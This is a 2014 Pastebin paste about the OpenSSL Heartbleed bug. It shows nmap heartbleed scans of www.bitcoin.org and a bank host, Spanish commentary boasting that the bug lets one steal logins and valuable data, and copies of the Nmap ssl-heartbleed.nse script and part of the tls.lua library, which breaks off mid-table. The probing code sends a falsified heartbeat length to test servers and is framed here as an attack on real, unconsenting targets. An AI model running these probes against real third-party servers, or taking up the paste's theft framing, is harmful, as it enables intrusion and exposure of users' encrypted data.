API tools faq
paste
Advertisement
Mayk0

SSL Heartbleed / 0day - Inj3ct0r / Mayk0

Mayk0
Apr 14th, 2014
515
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 49.23 KB | None | 0 0
raw download clone embed print report
  1. Mayk0@kali:~# nmap -PO -sT -p443 --script=ssl-heartbleed www.bitcoing
  2.  
  3. Starting Nmap 6.40 ( Http://nmap.org/ ) at 2014-04-14 05:07 CEST
  4. Namp scan report for www.bitcoin.org (88.198.199.140)
  5. Host is up (0.037s latency).
  6. rDNS record for 88.198.199.140: static.88-198-199-140.clients.your-server.de
  7. PORT STATE SERVICE
  8. 443/tcp open https
  9.  
  10. Nmap done: 1 IP addess (1 host up) scanned in 22.21 seconds
  11.  
  12. Happy Pentesting! Vulnerable Bitcoin!~
  13.  
  14. Solo descarga el https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse Y lo metes en la parte de (.../nmap/script/) donde estan los de extencion .nse , Luego te vas y descargas http://nmap.org/nsedoc/lib/tls.html y lo metes en la parte de (.../namp/nselib/) con la extencion .lua .......& Vualá! Jjajaja
  15.  
  16. Basicamente para que algunos lo entiendan, se puede sacar logeos o formularios mediante ssl, Osea gracias a esto podemos robar mucha informacion muy valiosa!
  17.  
  18. =====================================
  19.  
  20. https://www.commbank.com.au/blog/what-you-need-to-know-about-heartbleed.html
  21.  
  22. HTTP/1.1 301 Moved Permanently
  23. Content-Type: text/html; charset=iso-8859-1
  24. Date: Mon, 14 Apr 2014 09:00:39 GMT
  25. Location: https://www.commbank.com.au/
  26. Server: Apache/2.2.3 (Red Hat)
  27. Strict-Transport-Security: max-age=31536000
  28. Connection: Close
  29.  
  30. http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-40007/Apache-Http-Server-2.2.3.html
  31.  
  32. Host is up (0.40s latency).
  33. rDNS record for 54.252.129.251: ec2-54-252-129-251.ap-southeast-2.compute.amazonaws.com
  34. Not shown: 998 filtered ports
  35. PORT STATE SERVICE
  36. 80/tcp open http
  37. 443/tcp open https
  38.  
  39. =========================================================
  40. ssl-heartbleed.nse
  41.  
  42. description = [[
  43. Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).
  44. The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
  45. ]]
  46.  
  47. ---
  48. -- @usage
  49. -- nmap -p 443 --script ssl-heartbleed <target>
  50. --
  51. -- @output
  52. -- PORT STATE SERVICE
  53. -- 443/tcp open https
  54. -- | ssl-heartbleed:
  55. -- | VULNERABLE:
  56. -- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
  57. -- | State: VULNERABLE
  58. -- | Risk factor: High
  59. -- | Description:
  60. -- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
  61. -- |
  62. -- | References:
  63. -- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
  64. -- | http://www.openssl.org/news/secadv_20140407.txt
  65. -- |_ http://cvedetails.com/cve/2014-0160/
  66. --
  67. --
  68. -- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2
  69. --
  70.  
  71. local bin = require('bin')
  72. local match = require('match')
  73. local nmap = require('nmap')
  74. local shortport = require('shortport')
  75. local sslcert = require('sslcert')
  76. local stdnse = require('stdnse')
  77. local string = require('string')
  78. local table = require('table')
  79. local vulns = require('vulns')
  80. local have_tls, tls = pcall(require,'tls')
  81. assert(have_tls, "This script requires the tls.lua library from http://nmap.org/nsedoc/lib/tls.html")
  82.  
  83. author = "Patrik Karlsson <patrik@cqure.net>"
  84. license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
  85. categories = { "vuln", "safe" }
  86.  
  87. local arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {'TLSv1.0', 'TLSv1.1', 'TLSv1.2'}
  88.  
  89. portrule = function(host, port)
  90. return shortport.ssl(host, port) or sslcert.isPortSupported(port)
  91. end
  92.  
  93. local function recvhdr(s)
  94. local status, hdr = s:receive_buf(match.numbytes(5), true)
  95. if not status then
  96. stdnse.print_debug(3, 'Unexpected EOF receiving record header - server closed connection')
  97. return
  98. end
  99. local pos, typ, ver, ln = bin.unpack('>CSS', hdr)
  100. return status, typ, ver, ln
  101. end
  102.  
  103. local function recvmsg(s, len)
  104. local status, pay = s:receive_buf(match.numbytes(len), true)
  105. if not status then
  106. stdnse.print_debug(3, 'Unexpected EOF receiving record payload - server closed connection')
  107. return
  108. end
  109. return true, pay
  110. end
  111.  
  112. local function keys(t)
  113. local ret = {}
  114. for k, _ in pairs(t) do
  115. ret[#ret+1] = k
  116. end
  117. return ret
  118. end
  119.  
  120. local function testversion(host, port, version)
  121.  
  122. local hello = tls.client_hello({
  123. ["protocol"] = version,
  124. -- Claim to support every cipher
  125. -- Doesn't work with IIS, but IIS isn't vulnerable
  126. ["ciphers"] = keys(tls.CIPHERS),
  127. ["compressors"] = {"NULL"},
  128. ["extensions"] = {
  129. -- Claim to support every elliptic curve
  130. ["elliptic_curves"] = tls.EXTENSION_HELPERS["elliptic_curves"](keys(tls.ELLIPTIC_CURVES)),
  131. -- Claim to support every EC point format
  132. ["ec_point_formats"] = tls.EXTENSION_HELPERS["ec_point_formats"](keys(tls.EC_POINT_FORMATS)),
  133. ["heartbeat"] = "\x01", -- peer_not_allowed_to_send
  134. },
  135. })
  136.  
  137. local payload = "Nmap ssl-heartbleed"
  138. local hb = tls.record_write("heartbeat", version, bin.pack("C>SA",
  139. 1, -- HeartbeatMessageType heartbeat_request
  140. 0x4000, -- payload length (falsified)
  141. -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet
  142. -- header + 1 to overflow
  143. payload -- less than payload length.
  144. )
  145. )
  146.  
  147. local s
  148. local specialized = sslcert.getPrepareTLSWithoutReconnect(port)
  149. if specialized then
  150. local status
  151. status, s = specialized(host, port)
  152. if not status then
  153. stdnse.print_debug(3, "Connection to server failed")
  154. return
  155. end
  156. else
  157. s = nmap.new_socket()
  158. local status = s:connect(host, port)
  159. if not status then
  160. stdnse.print_debug(3, "Connection to server failed")
  161. return
  162. end
  163. end
  164.  
  165. s:set_timeout(5000)
  166.  
  167. -- Send Client Hello to the target server
  168. local status, err = s:send(hello)
  169. if not status then
  170. stdnse.print_debug("Couldn't send Client Hello: %s", err)
  171. s:close()
  172. return nil
  173. end
  174.  
  175. -- Read response
  176. local done = false
  177. local supported = false
  178. local i = 1
  179. local response
  180. repeat
  181. status, response, err = tls.record_buffer(s, response, i)
  182. if err == "TIMEOUT" then
  183. -- Timed out while waiting for server_hello_done
  184. -- Could be client certificate required or other message required
  185. -- Let's just drop out and try sending the heartbeat anyway.
  186. done = true
  187. break
  188. elseif not status then
  189. stdnse.print_debug("Couldn't receive: %s", err)
  190. s:close()
  191. return nil
  192. end
  193.  
  194. local record
  195. i, record = tls.record_read(response, i)
  196. if record == nil then
  197. stdnse.print_debug("%s: Unknown response from server", SCRIPT_NAME)
  198. s:close()
  199. return nil
  200. elseif record.protocol ~= version then
  201. stdnse.print_debug("%s: Protocol version mismatch", SCRIPT_NAME)
  202. s:close()
  203. return nil
  204. end
  205.  
  206. if record.type == "handshake" then
  207. for _, body in ipairs(record.body) do
  208. if body.type == "server_hello" then
  209. if body.extensions and body.extensions["heartbeat"] == "\x01" then
  210. supported = true
  211. end
  212. elseif body.type == "server_hello_done" then
  213. stdnse.print_debug("we're done!")
  214. done = true
  215. end
  216. end
  217. end
  218. until done
  219. if not supported then
  220. stdnse.print_debug("%s: Server does not support TLS Heartbeat Requests.", SCRIPT_NAME)
  221. s:close()
  222. return nil
  223. end
  224.  
  225. status, err = s:send(hb)
  226. if not status then
  227. stdnse.print_debug("Couldn't send heartbeat request: %s", err)
  228. s:close()
  229. return nil
  230. end
  231. while(true) do
  232. local status, typ, ver, len = recvhdr(s)
  233. if not status then
  234. stdnse.print_debug(1, 'No heartbeat response received, server likely not vulnerable')
  235. break
  236. end
  237. if typ == 24 then
  238. local pay
  239. status, pay = recvmsg(s, 0x0fe9)
  240. s:close()
  241. if #pay > 3 then
  242. return true
  243. else
  244. stdnse.print_debug(1, 'Server processed malformed heartbeat, but did not return any extra data.')
  245. break
  246. end
  247. elseif typ == 21 then
  248. stdnse.print_debug(1, 'Server returned error, likely not vulnerable')
  249. break
  250. end
  251. end
  252.  
  253. end
  254.  
  255. action = function(host, port)
  256. local vuln_table = {
  257. title = "The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.",
  258. state = vulns.STATE.NOT_VULN,
  259. risk_factor = "High",
  260. description = [[
  261. OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
  262. ]],
  263.  
  264. references = {
  265. 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',
  266. 'http://www.openssl.org/news/secadv_20140407.txt ',
  267. 'http://cvedetails.com/cve/2014-0160/'
  268. }
  269. }
  270.  
  271. local report = vulns.Report:new(SCRIPT_NAME, host, port)
  272. local test_vers = arg_protocols
  273.  
  274. if type(test_vers) == 'string' then
  275. test_vers = { test_vers }
  276. end
  277.  
  278. for _, ver in ipairs(test_vers) do
  279. if nil == tls.PROTOCOLS[ver] then
  280. return "\n Unsupported protocol version: " .. ver
  281. end
  282. local status = testversion(host, port, ver)
  283. if ( status ) then
  284. vuln_table.state = vulns.STATE.VULN
  285. break
  286. end
  287. end
  288.  
  289. return report:make_output(vuln_table)
  290. end
  291. ==========================================================================
  292. Library tls
  293.  
  294. A library providing functions for doing TLS/SSL communications
  295.  
  296. These functions will build strings and process buffers. Socket communication is left to the script to implement.
  297.  
  298. Author:
  299. "Daniel Miller <bonsaiviking@gmail.com>"
  300. Source: http://nmap.org/svn/nselib/tls.lua
  301.  
  302. Functions
  303.  
  304. client_hello (t)
  305. Build a client_hello message
  306.  
  307. record_buffer (sock, buffer, i)
  308. Get an entire record into a buffer
  309.  
  310. record_read (buffer, i)
  311. Read a SSL/TLS record
  312.  
  313. record_write (type, protocol, b)
  314. Build a SSL/TLS record
  315.  
  316. ==========================================================================
  317. tls.lua
  318.  
  319. ---
  320. -- A library providing functions for doing TLS/SSL communications
  321. --
  322. -- These functions will build strings and process buffers. Socket communication
  323. -- is left to the script to implement.
  324. --
  325. -- @author "Daniel Miller <bonsaiviking@gmail.com>"
  326.  
  327. local stdnse = require "stdnse"
  328. local bin = require "bin"
  329. local os = require "os"
  330. local table = require "table"
  331. _ENV = stdnse.module("tls", stdnse.seeall)
  332.  
  333. -- Most of the values in the tables below are from:
  334. -- http://www.iana.org/assignments/tls-parameters/
  335. PROTOCOLS = {
  336. ["SSLv3"] = 0x0300,
  337. ["TLSv1.0"] = 0x0301,
  338. ["TLSv1.1"] = 0x0302,
  339. ["TLSv1.2"] = 0x0303
  340. }
  341.  
  342. --
  343. -- TLS Record Types
  344. --
  345. TLS_RECORD_HEADER_LENGTH = 5
  346.  
  347. TLS_CONTENTTYPE_REGISTRY = {
  348. ["change_cipher_spec"] = 20,
  349. ["alert"] = 21,
  350. ["handshake"] = 22,
  351. ["application_data"] = 23,
  352. ["heartbeat"] = 24
  353. }
  354.  
  355. --
  356. -- TLS Alert Levels
  357. --
  358. TLS_ALERT_LEVELS = {
  359. ["warning"] = 1,
  360. ["fatal"] = 2,
  361. }
  362.  
  363. --
  364. -- TLS Alert Record Types
  365. --
  366. TLS_ALERT_REGISTRY = {
  367. ["close_notify"] = 0,
  368. ["unexpected_message"] = 10,
  369. ["bad_record_mac"] = 20,
  370. ["decryption_failed"] = 21,
  371. ["record_overflow"] = 22,
  372. ["decompression_failure"] = 30,
  373. ["handshake_failure"] = 40,
  374. ["no_certificate"] = 41,
  375. ["bad_certificate"] = 42,
  376. ["unsupported_certificate"] = 43,
  377. ["certificate_revoked"] = 44,
  378. ["certificate_expired"] = 45,
  379. ["certificate_unknown"] = 46,
  380. ["illegal_parameter"] = 47,
  381. ["unknown_ca"] = 48,
  382. ["access_denied"] = 49,
  383. ["decode_error"] = 50,
  384. ["decrypt_error"] = 51,
  385. ["export_restriction"] = 60,
  386. ["protocol_version"] = 70,
  387. ["insufficient_security"] = 71,
  388. ["internal_error"] = 80,
  389. ["user_canceled"] = 90,
  390. ["no_renegotiation"] = 100,
  391. ["unsupported_extension"] = 110,
  392. ["certificate_unobtainable"] = 111,
  393. ["unrecognized_name"] = 112,
  394. ["bad_certificate_status_response"] = 113,
  395. ["bad_certificate_hash_value"] = 114,
  396. ["unknown_psk_identity"] = 115
  397. }
  398.  
  399. --
  400. -- TLS Handshake Record Types
  401. --
  402. TLS_HANDSHAKETYPE_REGISTRY = {
  403. ["hello_request"] = 0,
  404. ["client_hello"] = 1,
  405. ["server_hello"] = 2,
  406. ["hello_verify_request"] = 3,
  407. ["NewSessionTicket"] = 4,
  408. ["certificate"] = 11,
  409. ["server_key_exchange"] = 12,
  410. ["certificate_request"] = 13,
  411. ["server_hello_done"] = 14,
  412. ["certificate_verify"] = 15,
  413. ["client_key_exchange"] = 16,
  414. ["finished"] = 20,
  415. ["certificate_url"] = 21,
  416. ["certificate_status"] = 22,
  417. ["supplemental_data"] = 23,
  418. ["next_protocol"] = 67,
  419. }
  420.  
  421. --
  422. -- Compression Algorithms
  423. -- http://www.iana.org/assignments/comp-meth-ids
  424. --
  425. COMPRESSORS = {
  426. ["NULL"] = 0,
  427. ["DEFLATE"] = 1,
  428. ["LZS"] = 64
  429. }
  430.  
  431. ---
  432. -- RFC 4492 section 5.1.1 "Supported Elliptic Curves Extension".
  433. ELLIPTIC_CURVES = {
  434. sect163k1 = 1,
  435. sect163r1 = 2,
  436. sect163r2 = 3,
  437. sect193r1 = 4,
  438. sect193r2 = 5,
  439. sect233k1 = 6,
  440. sect233r1 = 7,
  441. sect239k1 = 8,
  442. sect283k1 = 9,
  443. sect283r1 = 10,
  444. sect409k1 = 11,
  445. sect409r1 = 12,
  446. sect571k1 = 13,
  447. sect571r1 = 14,
  448. secp160k1 = 15,
  449. secp160r1 = 16,
  450. secp160r2 = 17,
  451. secp192k1 = 18,
  452. secp192r1 = 19,
  453. secp224k1 = 20,
  454. secp224r1 = 21,
  455. secp256k1 = 22,
  456. secp256r1 = 23,
  457. secp384r1 = 24,
  458. secp521r1 = 25,
  459. arbitrary_explicit_prime_curves = 0xFF01,
  460. arbitrary_explicit_char2_curves = 0xFF02,
  461. }
  462.  
  463. ---
  464. -- RFC 4492 section 5.1.2 "Supported Point Formats Extension".
  465. EC_POINT_FORMATS = {
  466. uncompressed = 0,
  467. ansiX962_compressed_prime = 1,
  468. ansiX962_compressed_char2 = 2,
  469. }
  470.  
  471. ---
  472. -- Extensions
  473. -- RFC 6066, draft-agl-tls-nextprotoneg-03
  474. -- https://www.iana.org/assignments/tls-extensiontype-values/tls-extensiontype-values.xhtml
  475. --
  476. EXTENSIONS = {
  477. ["server_name"] = 0,
  478. ["max_fragment_length"] = 1,
  479. ["client_certificate_url"] = 2,
  480. ["trusted_ca_keys"] = 3,
  481. ["truncated_hmac"] = 4,
  482. ["status_request"] = 5,
  483. ["user_mapping"] = 6,
  484. ["client_authz"] = 7,
  485. ["server_authz"] = 8,
  486. ["cert_type"] = 9,
  487. ["elliptic_curves"] = 10,
  488. ["ec_point_formats"] = 11,
  489. ["srp"] = 12,
  490. ["signature_algorithms"] = 13,
  491. ["use_srtp"] = 14,
  492. ["heartbeat"] = 15,
  493. ["application_layer_protocol_negotiation"] = 16,
  494. ["status_request_v2"] = 17,
  495. ["signed_certificate_timestamp"] = 18,
  496. ["client_certificate_type"] = 19,
  497. ["server_certificate_type"] = 20,
  498. ["padding"] = 21, -- Temporary, expires 2015-03-12
  499. ["SessionTicket TLS"] = 35,
  500. ["next_protocol_negotiation"] = 13172,
  501. ["renegotiation_info"] = 65281,
  502. }
  503.  
  504. ---
  505. -- Builds data for each extension
  506. -- Defaults to tostring (i.e. pass in the packed data you want directly)
  507. EXTENSION_HELPERS = {
  508. ["server_name"] = function (server_name)
  509. -- Only supports host_name type (0), as per RFC
  510. -- Support for other types could be added later
  511. return bin.pack(">P", bin.pack(">CP", 0, server_name))
  512. end,
  513. ["max_fragment_length"] = tostring,
  514. ["client_certificate_url"] = tostring,
  515. ["trusted_ca_keys"] = tostring,
  516. ["truncated_hmac"] = tostring,
  517. ["status_request"] = tostring,
  518. ["elliptic_curves"] = function (elliptic_curves)
  519. local list = {}
  520. for _, name in ipairs(elliptic_curves) do
  521. list[#list+1] = bin.pack(">S", ELLIPTIC_CURVES[name])
  522. end
  523. return bin.pack(">P", table.concat(list))
  524. end,
  525. ["ec_point_formats"] = function (ec_point_formats)
  526. local list = {}
  527. for _, format in ipairs(ec_point_formats) do
  528. list[#list+1] = bin.pack(">C", EC_POINT_FORMATS[format])
  529. end
  530. return bin.pack(">p", table.concat(list))
  531. end,
  532. ["next_protocol_negotiation"] = tostring,
  533. }
  534.  
  535. --
  536. -- Encryption Algorithms
  537. --
  538. CIPHERS = {
  539. ["TLS_NULL_WITH_NULL_NULL"] = 0x0000,
  540. ["TLS_RSA_WITH_NULL_MD5"] = 0x0001,
  541. ["TLS_RSA_WITH_NULL_SHA"] = 0x0002,
  542. ["TLS_RSA_EXPORT_WITH_RC4_40_MD5"] = 0x0003,
  543. ["TLS_RSA_WITH_RC4_128_MD5"] = 0x0004,
  544. ["TLS_RSA_WITH_RC4_128_SHA"] = 0x0005,
  545. ["TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5"] = 0x0006,
  546. ["TLS_RSA_WITH_IDEA_CBC_SHA"] = 0x0007,
  547. ["TLS_RSA_EXPORT_WITH_DES40_CBC_SHA"] = 0x0008,
  548. ["TLS_RSA_WITH_DES_CBC_SHA"] = 0x0009,
  549. ["TLS_RSA_WITH_3DES_EDE_CBC_SHA"] = 0x000A,
  550. ["TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA"] = 0x000B,
  551. ["TLS_DH_DSS_WITH_DES_CBC_SHA"] = 0x000C,
  552. ["TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA"] = 0x000D,
  553. ["TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA"] = 0x000E,
  554. ["TLS_DH_RSA_WITH_DES_CBC_SHA"] = 0x000F,
  555. ["TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA"] = 0x0010,
  556. ["TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"] = 0x0011,
  557. ["TLS_DHE_DSS_WITH_DES_CBC_SHA"] = 0x0012,
  558. ["TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"] = 0x0013,
  559. ["TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA"] = 0x0014,
  560. ["TLS_DHE_RSA_WITH_DES_CBC_SHA"] = 0x0015,
  561. ["TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA"] = 0x0016,
  562. ["TLS_DH_anon_EXPORT_WITH_RC4_40_MD5"] = 0x0017,
  563. ["TLS_DH_anon_WITH_RC4_128_MD5"] = 0x0018,
  564. ["TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA"] = 0x0019,
  565. ["TLS_DH_anon_WITH_DES_CBC_SHA"] = 0x001A,
  566. ["TLS_DH_anon_WITH_3DES_EDE_CBC_SHA"] = 0x001B,
  567. ["SSL_FORTEZZA_KEA_WITH_NULL_SHA"] = 0x001C,
  568. ["SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA"] = 0x001D,
  569. ["TLS_KRB5_WITH_DES_CBC_SHA-or-SSL_FORTEZZA_KEA_WITH_RC4_128_SHA"] = 0x001E, --TLS vs SSLv3
  570. ["TLS_KRB5_WITH_3DES_EDE_CBC_SHA"] = 0x001F,
  571. ["TLS_KRB5_WITH_RC4_128_SHA"] = 0x0020,
  572. ["TLS_KRB5_WITH_IDEA_CBC_SHA"] = 0x0021,
  573. ["TLS_KRB5_WITH_DES_CBC_MD5"] = 0x0022,
  574. ["TLS_KRB5_WITH_3DES_EDE_CBC_MD5"] = 0x0023,
  575. ["TLS_KRB5_WITH_RC4_128_MD5"] = 0x0024,
  576. ["TLS_KRB5_WITH_IDEA_CBC_MD5"] = 0x0025,
  577. ["TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA"] = 0x0026,
  578. ["TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA"] = 0x0027,
  579. ["TLS_KRB5_EXPORT_WITH_RC4_40_SHA"] = 0x0028,
  580. ["TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5"] = 0x0029,
  581. ["TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5"] = 0x002A,
  582. ["TLS_KRB5_EXPORT_WITH_RC4_40_MD5"] = 0x002B,
  583. ["TLS_PSK_WITH_NULL_SHA"] = 0x002C,
  584. ["TLS_DHE_PSK_WITH_NULL_SHA"] = 0x002D,
  585. ["TLS_RSA_PSK_WITH_NULL_SHA"] = 0x002E,
  586. ["TLS_RSA_WITH_AES_128_CBC_SHA"] = 0x002F,
  587. ["TLS_DH_DSS_WITH_AES_128_CBC_SHA"] = 0x0030,
  588. ["TLS_DH_RSA_WITH_AES_128_CBC_SHA"] = 0x0031,
  589. ["TLS_DHE_DSS_WITH_AES_128_CBC_SHA"] = 0x0032,
  590. ["TLS_DHE_RSA_WITH_AES_128_CBC_SHA"] = 0x0033,
  591. ["TLS_DH_anon_WITH_AES_128_CBC_SHA"] = 0x0034,
  592. ["TLS_RSA_WITH_AES_256_CBC_SHA"] = 0x0035,
  593. ["TLS_DH_DSS_WITH_AES_256_CBC_SHA"] = 0x0036,
  594. ["TLS_DH_RSA_WITH_AES_256_CBC_SHA"] = 0x0037,
  595. ["TLS_DHE_DSS_WITH_AES_256_CBC_SHA"] = 0x0038,
  596. ["TLS_DHE_RSA_WITH_AES_256_CBC_SHA"] = 0x0039,
  597. ["TLS_DH_anon_WITH_AES_256_CBC_SHA"] = 0x003A,
  598. ["TLS_RSA_WITH_NULL_SHA256"] = 0x003B,
  599. ["TLS_RSA_WITH_AES_128_CBC_SHA256"] = 0x003C,
  600. ["TLS_RSA_WITH_AES_256_CBC_SHA256"] = 0x003D,
  601. ["TLS_DH_DSS_WITH_AES_128_CBC_SHA256"] = 0x003E,
  602. ["TLS_DH_RSA_WITH_AES_128_CBC_SHA256"] = 0x003F,
  603. ["TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"] = 0x0040,
  604. ["TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"] = 0x0041,
  605. ["TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA"] = 0x0042,
  606. ["TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA"] = 0x0043,
  607. ["TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"] = 0x0044,
  608. ["TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"] = 0x0045,
  609. ["TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA"] = 0x0046,
  610. ["TLS_ECDH_ECDSA_WITH_NULL_SHA-draft"] = 0x0047, --draft-ietf-tls-ecc-00
  611. ["TLS_ECDH_ECDSA_WITH_RC4_128_SHA-draft"] = 0x0048, --draft-ietf-tls-ecc-00
  612. ["TLS_ECDH_ECDSA_WITH_DES_CBC_SHA-draft"] = 0x0049, --draft-ietf-tls-ecc-00
  613. ["TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x004A, --draft-ietf-tls-ecc-00
  614. ["TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA-draft"] = 0x004B, --draft-ietf-tls-ecc-00
  615. ["TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA-draft"] = 0x004C, --draft-ietf-tls-ecc-00
  616. ["TLS_ECDH_ECNRA_WITH_DES_CBC_SHA-draft"] = 0x004D, --draft-ietf-tls-ecc-00
  617. ["TLS_ECDH_ECNRA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x004E, --draft-ietf-tls-ecc-00
  618. ["TLS_ECMQV_ECDSA_NULL_SHA-draft"] = 0x004F, --draft-ietf-tls-ecc-00
  619. ["TLS_ECMQV_ECDSA_WITH_RC4_128_SHA-draft"] = 0x0050, --draft-ietf-tls-ecc-00
  620. ["TLS_ECMQV_ECDSA_WITH_DES_CBC_SHA-draft"] = 0x0051, --draft-ietf-tls-ecc-00
  621. ["TLS_ECMQV_ECDSA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x0052, --draft-ietf-tls-ecc-00
  622. ["TLS_ECMQV_ECNRA_NULL_SHA-draft"] = 0x0053, --draft-ietf-tls-ecc-00
  623. ["TLS_ECMQV_ECNRA_WITH_RC4_128_SHA-draft"] = 0x0054, --draft-ietf-tls-ecc-00
  624. ["TLS_ECMQV_ECNRA_WITH_DES_CBC_SHA-draft"] = 0x0055, --draft-ietf-tls-ecc-00
  625. ["TLS_ECMQV_ECNRA_WITH_3DES_EDE_CBC_SHA-draft"] = 0x0056, --draft-ietf-tls-ecc-00
  626. ["TLS_ECDH_anon_NULL_WITH_SHA-draft"] = 0x0057, --draft-ietf-tls-ecc-00
  627. ["TLS_ECDH_anon_WITH_RC4_128_SHA-draft"] = 0x0058, --draft-ietf-tls-ecc-00
  628. ["TLS_ECDH_anon_WITH_DES_CBC_SHA-draft"] = 0x0059, --draft-ietf-tls-ecc-00
  629. ["TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA-draft"] = 0x005A, --draft-ietf-tls-ecc-00
  630. ["TLS_ECDH_anon_EXPORT_WITH_DES40_CBC_SHA-draft"] = 0x005B, --draft-ietf-tls-ecc-00
  631. ["TLS_ECDH_anon_EXPORT_WITH_RC4_40_SHA-draft"] = 0x005C, --draft-ietf-tls-ecc-00
  632. ["TLS_RSA_EXPORT1024_WITH_RC4_56_MD5"] = 0x0060,
  633. ["TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5"] = 0x0061,
  634. ["TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA"] = 0x0062,
  635. ["TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA"] = 0x0063,
  636. ["TLS_RSA_EXPORT1024_WITH_RC4_56_SHA"] = 0x0064,
  637. ["TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA"] = 0x0065,
  638. ["TLS_DHE_DSS_WITH_RC4_128_SHA"] = 0x0066,
  639. ["TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"] = 0x0067,
  640. ["TLS_DH_DSS_WITH_AES_256_CBC_SHA256"] = 0x0068,
  641. ["TLS_DH_RSA_WITH_AES_256_CBC_SHA256"] = 0x0069,
  642. ["TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"] = 0x006A,
  643. ["TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"] = 0x006B,
  644. ["TLS_DH_anon_WITH_AES_128_CBC_SHA256"] = 0x006C,
  645. ["TLS_DH_anon_WITH_AES_256_CBC_SHA256"] = 0x006D,
  646. ["TLS_DHE_DSS_WITH_3DES_EDE_CBC_RMD"] = 0x0072, --draft-ietf-tls-openpgp-keys-05
  647. ["TLS_DHE_DSS_WITH_AES_128_CBC_RMD"] = 0x0073, --draft-ietf-tls-openpgp-keys-05
  648. ["TLS_DHE_DSS_WITH_AES_256_CBC_RMD"] = 0x0074, --draft-ietf-tls-openpgp-keys-05
  649. ["TLS_DHE_RSA_WITH_3DES_EDE_CBC_RMD"] = 0x0077, --draft-ietf-tls-openpgp-keys-05
  650. ["TLS_DHE_RSA_WITH_AES_128_CBC_RMD"] = 0x0078, --draft-ietf-tls-openpgp-keys-05
  651. ["TLS_DHE_RSA_WITH_AES_256_CBC_RMD"] = 0x0079, --draft-ietf-tls-openpgp-keys-05
  652. ["TLS_RSA_WITH_3DES_EDE_CBC_RMD"] = 0x007C, --draft-ietf-tls-openpgp-keys-05
  653. ["TLS_RSA_WITH_AES_128_CBC_RMD"] = 0x007D, --draft-ietf-tls-openpgp-keys-05
  654. ["TLS_RSA_WITH_AES_256_CBC_RMD"] = 0x007E, --draft-ietf-tls-openpgp-keys-05
  655. ["TLS_GOSTR341094_WITH_28147_CNT_IMIT"] = 0x0080, --draft-chudov-cryptopro-cptls-04
  656. ["TLS_GOSTR341001_WITH_28147_CNT_IMIT"] = 0x0081, --draft-chudov-cryptopro-cptls-04
  657. ["TLS_GOSTR341094_WITH_NULL_GOSTR3411"] = 0x0082, --draft-chudov-cryptopro-cptls-04
  658. ["TLS_GOSTR341001_WITH_NULL_GOSTR3411"] = 0x0083, --draft-chudov-cryptopro-cptls-04
  659. ["TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"] = 0x0084,
  660. ["TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA"] = 0x0085,
  661. ["TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA"] = 0x0086,
  662. ["TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"] = 0x0087,
  663. ["TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"] = 0x0088,
  664. ["TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA"] = 0x0089,
